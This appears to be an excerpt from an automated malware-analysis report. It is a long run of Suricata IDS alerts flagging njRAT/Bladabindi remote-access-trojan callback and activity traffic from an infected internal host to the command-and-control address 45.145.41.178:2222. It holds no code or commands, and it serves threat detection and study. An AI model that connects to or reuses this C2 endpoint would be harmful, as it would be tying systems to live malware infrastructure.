Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54012 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:53994 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54013 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54013 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54014 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54014 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:53996 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54015 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54016 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54015 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53998 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54016 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:53998 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54009 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54018 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:53999 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54018 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54018 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54019 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54006 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54019 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54001 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54001 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54001 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54020 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54020 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54020 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54022 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54022 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54022 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54011 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54003 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54007 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54023 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54023 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54007 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54007 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54024 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54024 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54015 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54025 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54025 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54019 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54014 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54012 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54026 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54026 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54027 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54001 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54027 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54026 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54028 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54027 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54022 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54028 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54030 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54021 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54031 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54030 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54030 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54021 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54021 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54033 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54031 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54028 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54033 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54016 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54017 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54017 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54034 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54034 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54005 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54005 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54035 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54005 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54037 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54024 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54035 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54037 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54018 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54041 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54041 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54039 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54041 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54042 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54036 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54042 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54036 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54039 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54043 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54017 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54043 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54045 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54045 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54045 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54027 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54034 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54037 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54048 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54032 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54033 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54047 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54047 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54047 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54032 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54048 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54050 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54050 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54031 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54038 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54038 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54051 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54051 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54038 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54023 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54052 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54052 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54041 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54043 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54053 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:53998 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54055 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54053 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54047 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54010 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54055 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54010 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54036 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54048 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54057 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54057 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54058 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54042 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54058 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54060 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54060 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54060 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54040 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54058 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54038 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54040 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54039 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54040 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54062 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54029 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54062 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54062 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54029 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54032 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54064 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54029 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54065 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54065 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54053 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54065 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54064 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54050 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54069 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54067 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54049 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54069 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54057 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54067 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54061 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54049 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54061 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54059 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54070 -> 45.145.41.178:2222
Source: Network traffic Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54059 -> 45.145.41.178:2222
